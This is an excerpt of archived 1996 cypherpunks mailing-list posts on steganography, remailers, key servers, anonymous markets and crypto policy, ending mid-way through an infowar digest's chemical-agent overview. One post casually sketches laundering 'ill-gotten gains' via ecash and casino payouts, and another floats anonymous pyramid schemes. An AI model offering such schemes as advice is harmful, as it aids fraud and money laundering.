bytes from the LSbit of an audio file.  Linux loop back devices
already provide the stego capability directly.  But then linux loop
back devices provide IDEA encryption.  (I'm talking about Ian
Goldbergs patch to the loopback filesystem, which may not have been
folded back in yet).

Also you may be able to get somewhere with algorithms which are
plausible to have coded on your system anway.  Say, RC4 makes a good
PRNG, so what's wrong with having it in a standard library.  That
makes coding RC4 really simple.  Just reseed the PRNG with your key,
and XOR it's output with the encrypted file.

Also I did hear tell that Bruce Schneier was working on a crypto
algorithm which was designed to work with playing cards, for a book
which Neal Stephenson is writing.  Presumably painful to use, but
maybe good plausible deniability, all that you need is a pack of
cards.

> (I am deeply envious of your legal right to post this code, however.
> Now, why was it that we broke away from the Mother Country?)
>
> I would like to see a longer exposition of your approach.  Given
> a hostile environment, how would I operate a small anonymous perl
> coding service using your techniques?  

Once you've bootstrapped to your cryptoanarchists toolkit, you can
have anything you want, even a virtual TCP/IP layer, a hidden level of
TCP/IP in stego data.  TCP/IP itself is a likely candidate for a stego
carrier.  Non-predictable sequence nos are required to stop things
like the spoofing attack, and so are perfectly plausible.

The real pain at the moment is that bandwidth is so darned low.
You're talking 28.8k for most users, and I'd quite merrily pay $2000 a
year for a fractional T1 for personal use, but prices over here are
too high yet.

Once we get to everyone having enough bandwidth, lots of people with
permanent connections, lots of people using video conference software,
audio, downloading feature length films, etc. there's no stopping
crypto anarchy.  The LSbits in that lot would make a fairly responsive
subliminal channel by todays standards.

> Don't forget to tell me how I get paid and when I get to spend my
> "ill-gotten" gains and how nobody will notice that I am doing it.

You get paid in ecash, paid on the BlackNet bank.  You take a holiday
to a tax-haven and get paid off by a getting "lucky" at a BlackNet
affiliated casino.  The casino takes a their "currency exchange fee",
and you get US$.  Translations into paper currencies, I'll admit are
the weak link if you need paper currencies.  

However there are two ways to get anonymous electronic cash, either
you start with anonymous electronic cash, or you add the anonymity
afterwards via `privacy brokers', once there are a few dozen systems,
and trillions flowing around using these systems, it's going to be
hard to keep track of it all.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Nov 1996 20:54:44 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: A Disservice to Mr. Bell
Message-ID: <199611110453.UAA16211@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:16 AM 11/10/96 -0800, Dale Thorn wrote:
>jim bell wrote:
>
>> Interestingly enough, the one thing the Commonlaw court system needs is an
>> effective enforcement system.  One likely method is the commercial lien
>> process, but even that tends to be resisted by people who are far more used
>> to dealing with equity court personnel.  It turns out that my AP system
>> seems to mesh almost perfectly with their needs, although obviously in
>> practice it would only be used as a "last resort."
>
>Speaking of Common Law courts and their Liens, the feds have expanded their crackdown
>begun with the Freemen of Montana.  They arrested Elizabeth Broderick and several of
>her associates or whatever, and I know at least one person personally who is hiding
>or keeping a very low profile at least.  [these are people in the common law/lien
>business]


This is, generically, a dispute that the Federal government will eventually 
lose, I think within 10 years or so.  Commonlaw courts were quite real (in 
fact they pre-dated equity courts by at least 2-3 centuries), and they can 
rapidly reconstitute themselves along their original lines. 

There are, I think, two reasons that the equity court system (and their 
sleazy lawyers, both on and off the bench) are worried.  First, what they 
have now is, effectively, a monopoly on "justice."  The re-emergence of 
commonlaw courts would provide competition that has been long gone.  Think 
of it like any monopoly that suddenly has to accept competition.

  The second reason is that with the return of commonlaw courts will be 
eliminated the tradition (and that's all it was, effectively a tradition) of 
judicial immunity.  Imagine how easy it could be to bring criminal charges 
against judges, lawyers, cops, and others who are either "impossible" to sue 
or at least very difficult.  






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 10 Nov 1996 20:55:27 -0800 (PST)
To: tom bryce <cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
Message-ID: <v02140b01aeac56fff48d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 AM 11/10/1996, tom bryce wrote:
>Here's a question: if one were designing for oneself a secure personal
>computer system, for use in, say, word processing, spreadsheet,
>communications, the usuals - what system would one purchase and how would
>one set it up?
>
>For example, on the Mac I would envision this as the ideal system:
>
>(1) Get a power mac
>(2) Partition the hard drive into two partitions:
>    install the system folder on one and a copy of CryptDisk
>    make this the startup partition and make it READ ONLY with aliases to
>    folders you want to be modiyfable (such as Eudora Folder in the sys folder)
>    place these folders on the encrypted partition
>(3) Completely fill the other partition with a CryptDisk file so there is no
>    room for other stuff to be written. Adjust the partition size if needed.
>(4) Install a screen saver (such as shareware Eclipse) that will password lock
>    the screen after a few minutes of inactivity, and set CryptDisk to dismount
>    the external partition after a few minutes of inactivity (or longer)

Watch out for the clipboard which appears to be stored as a file in
the system folder.  Unfortunately, it has to be a real file - aliases
not allowed.  This makes it harder to have a read only system folder
and, of course, every time you cut and paste something you leave a
ghost on the disk for an undefined length of time.  It's hard to
work on the Mac without using the clipboard.

I would love to know a workaround for this.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 10 Nov 1996 21:20:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <199611090534.XAA03845@manifold.algebra.com>
Message-ID: <199611110508.VAA15800@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: ichudov@algebra.com (Igor Chudov @ home):
> 
> I also used RPN calculators 10 years ago, in high school, in Russia.
> Still miss them.  Which model (for no more than $40 or so) is the best
> around here?
> 
> Sorry if this question has already been answered here, nowadays it is 
> pretty tough list to read.

I recommend the GNU emacs calculator.  While not quite as portable as
some of the HP calculators, it is free, and is definitely the best
calculator I have ever seen, period.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 11 Nov 1996 10:43:17 -0800 (PST)
To: gt@kdn0.attnet.or.jp
Subject: Re: RSA and me...
In-Reply-To: <Pine.3.89.9611100849.A26358-0100000@netcom6>
Message-ID: <199611102111.VAA00303@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> wrote:
> Gemini Thunder <gt@kdn0.attnet.or.jp> wrote:
> > 'Lo.
> > Is the "RSA in 3 lines of Perl" a munition (under ITAR)?
> > What if I got it as a tatoo?  
> 
> Somebody did this. Check the RSA in perl homepage.

It was Richard White, for a gif, see:

	http://www.dcs.ex.ac.uk/~aba/rsa/tattoo3.gif
	http://www.dcs.ex.ac.uk/~aba/rsa/

The program got smaller since then, see .sig below.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@outlook.net>
Date: Sun, 10 Nov 1996 18:20:08 -0800 (PST)
To: "David K. Merriman" <cypherpunks@toad.com
Subject: Re: Rarity: Crypto question enclosed
Message-ID: <199611110219.SAA26107@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Sorry that this message doesn't include any flames, "outings",
> denigrations, or other stuff......

Hey, that "stuff" comes in useful.

Some of the more origional ones are posted on my office wall,
so when people accuse me of being a childish, insensitive and
 egotistical  I just show them some cypherpunk postings, "See, I'm not
this bad, count yourself fortunate how would you like to work for some
of these guys?"

> My simple question is regarding key/certificate distribution:
> 
>         Is there any particular reason that such can't be
accomplished via 
> on-line lists, and made available via a service on a port, using
standard 
> (textual) commands, like mail and such are now?

Conceptual, I had the same idea about a year ago, but never enough
time to do it. Practically, it could be painful.

It's possible to have a key-server listen on a port and accept
requests, then it would
fork a process, process the result, and return an answer set.

But how many CPU cycles would it take for a machine to process a
request, ie going through
1000 of keys?  I am not exactly sure, it took a long while on my
pentium.

In my opinion, if I were to run a key server as a service, with
clients connecting and requesting a key
it shouldn't take more than a minute to get a responce.

>         The things that come to mind are a 'client' request for a
key, a 
> 'client' submission of a key, an external host requesting a key
exchange, 
> and the host itself requesting a key exchange with another system
(only 
> new/changed keys being swapped).

Had the exact same idea, but came up with an interesting concept. When
a person submits a key, a PGP process is spawned yeilding the
following information 1.) The name (peponmc@cris.com) 2.) The real
name (Michael Peponis) 3.) The key size 4.) Creation date of the key
5.) Key finger print

This information, along with the acutal key would be inserted into a
SQL Database table

With a structure similar to this

Name           varchar2
Real_name   Varchar2
KeySize        Integer
CreationDate date
PGPKEY       Varchar(a fairly large one)
Submission_date  Date

The idea here being that the key would be added as a field, and
requests from clients
and other key servers would do a simple Database query, which are very
quick.





>         The way I see it working is similar to (but not as slow as,
or 
> requiring the human intervention) of the key servers already
existing. 
> Granted that the first few such servers might carry a higher load,
but I'd 
> think that would taper off as the (presumably free) software became

> available, similar to the growth of remailer software (which would
seem to 
> be a fairly reasonable relationship....).

>         Hooks into existing PGP-fluent software shouldn't be
difficult with 
> a standardized protocol, and I wouldn't think that the servers
would be 
> that difficult to code and implement on a 'standard' (consistently
used, 
> that is) port.


It's not that hard, it's performance that's more of an issue.  The
beauty of my approch would be that initially, there would be alot of
"Add" requests, resulting in many PGP processes running on the box,
but eventually, they would tapper off.

Database requests pose no real problems, on Unix boxes, especially
with Oracle, the SGA is always running, it's just one more request,
going up against a realatively small table.  The box could return an
answer in a matter of seconds, as opposed to over a two minutes.

Server updates would be swift too, they would just transfer well
defined SQL Datasets between themselves.

>         I'm willing to have a try at the first server, if the
parameters 
> can be defined.


Let me know what you think of my idea 
> Dave Merriman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBMoZirkUffSIjnthhAQFBpAQAw1a48NY/IPai8FqAkqlfi2tLoreGlQlW
RaWLVnSE/dl4CpRf+nLXjRRYQL6FlmKxfVkgv68yS3srFlx9KpkGqOT3k9hZGfzU
3X+ADKI2oKzSZM92vmYoM+BGtxggdgg/SjoPwyxq76FuiHt6SnDcCvXeRUDclFHi
CMqPPKvaqBo=
=Yudv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 10 Nov 1996 21:25:54 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Pyramid Schemes
In-Reply-To: <Nw77wD18w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.961110211847.1766B-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> I think the following would be a worthwhile cypherpunks project: design the
> anonymous infrastructure to allow those who wants to participate in MMF-like
> pyramid schemes on the Internet to do so without bothering anyone.

It seems to me that any such scheme is doomed to failure, unless I
misunderstand what people are talking about here. While I believe that
there really is a `sucker born every minute', and it is that which makes
pyramid schemes work, I don't believe that too many people would jump on
board unless they see real, verifiable names linked with the schemes. 
Isn't it just common sense to say that if people are hiding their identity
while offering to `make money fast' then there is something seriously
shady going on? Aren't people *less* likely to join in under such
circumstances?  Sure, it allows such schemes to work in theory but in
practice, how do you get people to join in? Who would/how could you
*trust* such a scheme? 

Perhaps I give people too much credit? 

cheers, kinch







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 11 Nov 1996 10:37:45 -0800 (PST)
To: vznuri@netcom.com
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <199611101939.LAA13170@netcom4.netcom.com>
Message-ID: <199611102130.VAA00658@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Nuri <vznuri@netcom.com> writes:
> an encrypted reply block using remailers is pretty secure technology.
> the remailers are not all that reliable however and these reply
> blocks are always breaking; they depend on every link in the chain
> working perfectly. I've proposed having an anonymous pool in which
> remailers post status information when they successfully pass on
> messages, such info could be used to make the remailers more reliable,
> although possibly at the expense of having to buffer messages.

Perhaps it would be feasible to provide in each hop of the reply
block, a second address to send errors to.  This could be a newsgroup
(alt.anonymous.messages), and a key to encrypt the error message with.
Looking at a.a.m now and then would then be sufficient to check on the
status of your reply blocks.

Bouncing messages to your own reply block to `ping' it, is another
way.

I'd like to see ways to have reply blocks which are more resilient to
single remailer failures, both transient failures, and remailers
decomissioning without warning.  My thoughts so far are that it may be
possible to acheive these goals by having a reply block secret split
across remailers, so that the chosen proportion, k of n remailers are
sufficent for your reply to get through.

> [...]
> it seems to me the main proponents of "cryptoanarchy" tend to suggest
> a government structure is a completely useless construction. perhaps
> so but they would end up erecting othre systems to deal with the
> void they might not call "govt" but would have most of the features
> of one, imho. something "govtlike" is a measure of a civilized society,
> imho, hence my distaste in cryptoanarchy with its seeming naivete
> on the legitimate and crucial role of govt in a society. the specifics
> may vary between implementations, but imho in general something
> "govtlike" is crucial to civilized society.

Perhaps you may to prefer to think about it in terms Harry Browne's
campaign slogans, about reducing government to 10% (or whatever).
It's not that easy to get rid of government all at once, and you'll
get to see how having less government works out in practice, as it is
shrinking.  You've got to admit government is too big, at least!

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Date: Sun, 10 Nov 1996 04:50:05 -0800 (PST)
To: Dave Kinchlea <cypherpunks@toad.com
Subject: Re: a retort + a comment + a question = [RANT]
Message-ID: <9610108476.AA847691156@smtp-gw.cv62.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------
dave kinchlea wrote:
>As said in "Hair" (the movie), "Don't do it for me man, 'cause 
>if the shoe was on the other foot, I wouldn't do it for you!" 

>It's a lie anyway, you do it for yourself.

That's an _easy_ judgment to make (and i definitely have to stop 
adding anecdotes from my life in these things!), but you missed the 
point - the freedoms the Cpunks diligently try to preserve (or seem to 
want to create...) are protected _by_ the military.  who was it that 
said:       "law, without force, is impotent"  -?  

keep in mind that even "bad" laws have to be enforced.  you can scream 
all you want about "good, strong" cryptostuffs, but if the phone lines 
are slashed, the satellite links are down, the elcerticity is off and 
you've got a foreign soldier waving a .45 around -  just how are you 
going to boot up that pretty little computer and make it encode 
information for you, much less get it anywhere?  anarchy implies 
ruthlessness - you going to practice cryptostuffs from a prison cell?

was i assuming that you've read the book and/or seen the broadway 
play, "Hair"?  OHHHHH - i'm sorry - you saw the _movie!_ shame on me.

---------------------- SUCRUM22@cv62.navy.mil -----------------------
a calculated risk based on the possible consequence of an action
is better than a haphazard one based on poor judgment or ignorance
--------------------------------------------------------------------- 
Don't confuse my views with those of the DoD or the United States Navy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 10 Nov 1996 18:45:49 -0800 (PST)
To: inglem@adnetsol.com>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <199611100747.XAA00328@cryptical.adnetsol.com>
Message-ID: <Pine.LNX.3.95.961110214102.1690A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Nov 1996, Mike Ingle wrote:

> A theoretical discovery is needed particularly in the area of recipient
> anonymity. Good sender anonymity and weak recipient anonymity leads to
> 'hit and run' behavior such as spamming email and newsgroups, but not
> to anonymous markets.

The current nymservers offer pretty good security.  The only problem is they
are vulnerable to traffic analysis.  If an attacker wants to find out whether
a particular person is using a pseudonym, he could send a lot of messages to
the nym and if the suspected user receives that same amount of messages in
anonymously remailed traffic.  This would confirm the attacker's suspicion.
There are a few ways to protect against this.  One way is for a person to
request that email stored on the nym server be delivered.  The email could be
delivered as one large encrypted message.  The user could also request each
email individually, but this does have some drawbacks.  Delivering each message
as it is received is a Bad Thing.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoaT0yzIPc7jvyFpAQFJWQf9FiQUfKlgs0oI1rLx6qFB7tbxkNkMnzsx
fGG4QDh8XxokWF6eJW5550mlC/kpZF81/QUHQMkbQqpqWud8Pvzxo1dBxRkhcKsC
xnI44ICR2t4xDww0DOt5P3XG0FbBoQUYfeJkD3Mjw1ZNq838hSJrZjF+06sB2y7V
fMd5JXJtqLWsHMvlXYpu1oHr0K4aB+iddBIERZjyDLDsXf4ejuQapio7OO1fSE1n
Rk1cR+zHIh5iWLMYyHzFXMyLCOVE1PhwndOfiUlwIlI59ISu40Anl+qJ+7I7rEQu
i3BJipswUOZ47V1c0Ek/DixI1F5rV6NFxd4zJlYRYB3KvcOrNwWThg==
=WWzM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 21:40:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rarity: Crypto question enclosed
In-Reply-To: <199611102102.NAA17006@toad.com>
Message-ID: <Xkk8wD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David K. Merriman" <merriman@amaonline.com> writes:
> To: cypherpunks@toad.com
> Date: Sun Nov 10 15:03:35 1996
> Sorry that this message doesn't include any flames, "outings",
> denigrations, or other stuff......
>
> My simple question is regarding key/certificate distribution:
...

Are you sure this is on-topic for John Gilmore's private mailing list?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 10 Nov 1996 22:18:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: hahaha
Message-ID: <199611110556.VAA16710@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Nov 1996 22:40:14 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: Dr. Vulis
Message-ID: <199611110639.WAA22673@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 PM 11/5/96 +0100, Gary Howland wrote:

>> > I recall we've been through this over a year ago, when I saw an 
announcement
>> > of a cypherpunks physical meeting where someone was excluded for his 
political
>> > views, and I said that I don't consider myself a cypherpunk. I'm glad that
>> > John and Bill, the auhorities on cypherpunk membership, finally concur.
>
>
>I think he is referring to the explicit and public non-invite of Jim
>Bell to a cypherpunks meeting, due to some of Jim Bell's Assination
>Politics posts.
>Gary


I'd like to correct this impression.  Alan Olsen was, apparently, quite 
aware of my AP posts when I (and everyone else) was invited to the first 
Portland CP meeting.  I had heard no objection to them from him.  The 
meeting was advertised as being sufficiently confidential that he 
specifically requested that nobody take pictures or record the meeting, etc. 
 Fair enough, I thought.  I generally interpreted this to mean that the 
meeting was at least approximately "off the record."

Arriving at the meeting, I detected no indication that Alan Olsen was at all 
disturbed at me, or anything I had said previously.  At the meeting all went 
well, _or_so_I_thought_.    It was all very routine.  One thing I decided to 
mention, actually only hint at, was a technical capability that I was 
working one.   However, I gave merely the broadest hints; What I did say 
would certainly have sounded technically at least implausible, if not quite 
impossible.   (The situation was somewhat analogous to the old story about 
the blind men coming across an elephant; one touches only the tail and calls 
it a snake, the other touches a leg and calls it a tree, etc.)  
Intentionally, I didn't explain how I would accomplish the goal I described.

Even so, there was still no indication from Alan Olsen that anything was 
amiss. And the meeting ended on that note.

Much to my surprise, Alan Olsen blurted out over the CP list only a barely 
fair description of what I had said (which itself was only the hints I chose 
to describe) and called me various names, etc.  I think he used the term 
"voodoo" to describe what I was planning to develop.  When, eventually, I 
_do_ explain the whole thing, and I repeat exactly what I told the assembled 
group, it will become obvious why what I described _sounded_ so implausible, 
yet was quite doable given modern technology.

I should point out that given how little I told, avoiding the REAL 
explanation, it could very well have been taken for voodoo.  And it didn't 
surprise me that SOMEBODY would have come to that impression.   The 
surprising and shocking thing about it was that he (Alan Olsen) violated the 
very confidentiality he had insisted on, without any sort of warning, and 
after-the-fact.  Needless to say, I raked him over the coals publicly, on 
CP, for having done this, and he was severely chastized because of this.  
"Ripped him a new one"  might describe it, although he certainly deserved 
the treatment.

Obviously, a number of people on this list got the mistaken impression that 
this disagreement had something to do with my AP proposal.  As far as I 
know, quite the contrary, it did not.  But I saw two possibilities, after 
the fact:  One, Alan Olsen hid his disapproval for AP, hoping to catch me in 
some sort of contradiction.  Two, after he was embarrassed by my calling him 
on his bad behavior, he grabbed at the first thing he could think of to 
criticize me.





  
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Igor Chudov @ home" <ichudov@algebra.com>
Date: Sun, 10 Nov 1996 21:03:06 -0800 (PST)
Subject: No Subject
Message-ID: <199611110436.WAA15563@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


manifold::~==>premail -t cypherpunks@toad.com
Chain: haystack;jam
Subject: I urgently need a lot of money.

Please share your money-making secrets, I am in a desperate need
for cash.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Nov 1996 22:55:41 -0800 (PST)
To: cypherpunks@toad.com>
Subject: Re: WIPO Treaty:  Worse than CDA- Deadline 22 Nov 96
Message-ID: <199611110655.WAA23446@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 11/11/96 +0000, attila@primenet.com wrote:
>                WIPO Treaty:  Worse than CDA
>                Deadline 22 Nov 96 for comment to Congress
>        WIPO was introduced this spring to Congress.  It is not 
>    understood by either the Clinton administration or the Congress and
>    few of the public are aware of the problem!
[snip]
>        I am deleting the bulk of the report for brevity, including only
>    the definition of the "database" as it applies to WIPO.
>
>-.WHAT IS A DATABASE? WHAT ISN'T A DATABASE?
>-.The treaty would protect "any database that represents a 
>-.substantial investment in the collection, assembly, verification, 
>-.organization or presentation of the contents of the database." 
>-.
>-.This term should be understood "to include collections of 
>-.literary, musical or audiovisual works or any other kind of 
>-.works, or collections of other materials such as texts, sounds, 
>-.images, numbers, facts, or data representing any other matter or 
>-.substance" and "may contain collections of expressions of 
>-.folklore." The "protection shall be granted to databases 
>-.irrespective of the form or medium in which they are embodied. 

Somebody must have said, once, that the winner in an argument is the one who 
gets to define the terms.  Notice how the term "protect" and "protection" 
are misused above. (not by Attila, of course; but by whomever he's quoting.)  

However, the term "protect" has long been misused by lawyers in just such a 
way.  "Monopolize" would be a more appropriate word under the circumstances.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 10 Nov 1996 23:07:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: a retort + a comment + a question = [RANT]
Message-ID: <v02140b0daeac7ff69503@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 11/10/1996, SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:
> ...and you've got a foreign soldier waving a .45 around...

Ummm.... just a .45?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Caspar Bowden <qualia@dircon.co.uk>
Date: Sun, 10 Nov 1996 15:25:21 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Scientists for Labour conf on encryption/escrow/data protection Nov 14th
Message-ID: <01BBCF5D.FA366E80@qualia.dircon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Full details: http://www.shef.ac.uk/~sfl/meetings/itconf.html

		PLEASE DISTRIBUTE AND LINK TO YOUR WEB-SITE: 

	Scientists for Labour - IT & Communications Group    
	  Conference on Information Superhighway Policy 

---------------------------------------------------------------------	
"Liberty on the Line : Opportunities and Dangers of the Superhighway" 
---------------------------------------------------------------------	

	Chaired by Geoff Hoon MP, Shadow Minister for IT 

	Thursday 14th November 1996, 9am - 5:30pm 
	
	MSF Centre, 33-37 Moreland Street, London EC1 (Angel tube) 
---------------------------------------------------------------------	

For further details or to reserve a place contact:
Caspar Bowden, SfL IT & Comms co-ordinator (qualia@dircon.co.uk)


The debate over Internet regulation in the UK has focused mainly on 
censorship, but the standards for control of "encryption keys", currently
being formulated nationally and internationally, will lay the permanent
foundations on which the Information Society is built. The long-term 
implications for civil liberties have received little public attention 
outside the Internet community.

Scientists for Labour is hosting a conference to look at the data protection 
and economic issues arising from the integration of digital signatures, 
electronic copyright management, and digital cash. What kind of regulatory 
apparatus will allow rapid growth of an information economy, but prevent 
misuse of personal data ? 

*) New government proposals on "Trusted Third Parties", which aim to preserve
   law enforcement and national security capabilities for warranted 
   interception of communications (to fight crime and terrorism), place only 
   procedural not technical limits on the scope of Superhighway surveillance. 

*) Super-computers have the potential to conduct random electronic "fishing 
   expeditions" against the whole population. Telephone and letter 
   interception cannot be automated : digital monitoring can. 

Will legal safeguards against abuse offer adequate protection in perpetuity, 
or can cryptographic protocols be designed which make Superhighway mass-
surveillance impossible, while still allowing criminals to be targeted ? 

Computer and legal policy experts will explain the principles of the 
different technologies, and the international and commercial context, in a 
search for interdisciplinary solutions. 

The attendance fee is ?5 (?2 unwaged ; SfL members free) 

For press information please contact : 
Bobbie Nicholls, SfL Press Officer, Fax: 01235 529172 

The Scientists for Labour home page (http://www.shef.ac.uk/~sfl/)
has information on how to join SfL, or contact the Secretary : 
Dr Robin Walters (R.G.Walters@shef.ac.uk) 


					Programme 
					---------

9.00-9.30	Registration	SfL members free, non-members ?5 (?2 unwaged)

9.30-9.45	Geoff Hoon MP 	Introduction 

9.45-10.45	Dr.John Leach 	Cryptography and developments in Trusted Third
					Party policy

10.45-11.45	Dr.Ross Anderson	Some problems with the Trusted Third Party 
					programme 

11.45-12.00	Coffee	

12.00-12.30	Elizabeth France (Data Protection Registrar)

12.30-1.00	Simon Davies 	Escrow and the hidden threat to human rights
 					and privacy

1.00-2.00	Buffet lunch	

2.00-2.45	Prof. Charles 	Public policy and legal aspects of Intellectual
		Oppenheim 		Property Rights 

2:45-3.30	Alistair Kelman 	Electronic Copyright Management : 
					Possibilities and Problems
3.30-3.45	Tea	

3:45-4:45	Andrew Graham 	Will the Information Superhighway enhance or
					diminish democracy ? 

4.45-5.30	Panel Session	Discussion (inc. Robert Schifreen)
---------------------------------------------------------------------	











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Igor Chudov @ home" <ichudov@algebra.com>
Date: Sun, 10 Nov 1996 21:49:52 -0800 (PST)
Subject: FUCK ME HARD
Message-ID: <199611110547.XAA15989@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


FUCK NME HARD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "list" <list@infowar.com>
Date: Sun, 10 Nov 1996 21:12:44 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: infowar Digest for 10 Nov 1996
Message-ID: <199611110511.VAA01029@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                       infowar Digest for 10 Nov 1996

Topics covered in this issue include:

   1: RE: Chemical Warfare Agents
             by alm@io-online.com
   2: Propaganda and TWA/CIA-Cocaine
             by winn@infowar.com



--------------------------------------------------------------------------
1                                Message:0001                            1
--------------------------------------------------------------------------
To: infowar@infowar.com
From: "Betty G. O'Hearn" <betty@infowar.com>
Subject: Infowar Digest  Vol. 1  # 1


infowar@infowar.com 

                     Sunday, November 10 1996    Volume 01: Number 01

                                       We thank our sponsors:

National Computer Security Association
OPEN SOURCE SOLUTIONS Inc.
New Dimensions International - Security Training
Secure Computing Corporation
HOMECOM Communications
Internet Security Solutions
___________________________________________________________

Infowar@infowar.com is brought to you in the  the interest of an open, 
unclassified exchange of information and ideas as a means for advancement of
Information Warfare related issues.   Topics of discussion for this list
include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques,
Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD. 

As the list expands we will adapt to the needs and desires of our subscribers. 

This is a DIGEST format.
________________________________________________________________

Contents of this Digest:               Volume 01: Number 01 

Infowar@infowar.com   Chemical Warfare Agents
Infowar@infowar.com   Iraq   WMD
Infowar@infowar.com   RE: Chemical Warfare Agents

----------------------------------------------

To:        Wilson, Gary, COL, OSD/RA  GWilson@osd.pentagon.mil
Cc:         betty@infowar.com
Subject:  Re: Chemical Warfare Agents

Chemical Warfare Agents
An overview of chemicals defined as chemical weapons

>> Main Groups
>>
>>     Nerve Agents
>>     Mustard Agents
>>     Hydrogen Cyanide
>>     Tear Gases
>>     Arsines
>>     Psychotomimetic Agents
>>     Toxins
>>     Potential CW Agents
>>
What is a Chemical Warfare Agent?

A United Nations report from 1969 defines chemical warfare agents as " ... 
chemical substances, whether gaseous, liquid or solid, which might be
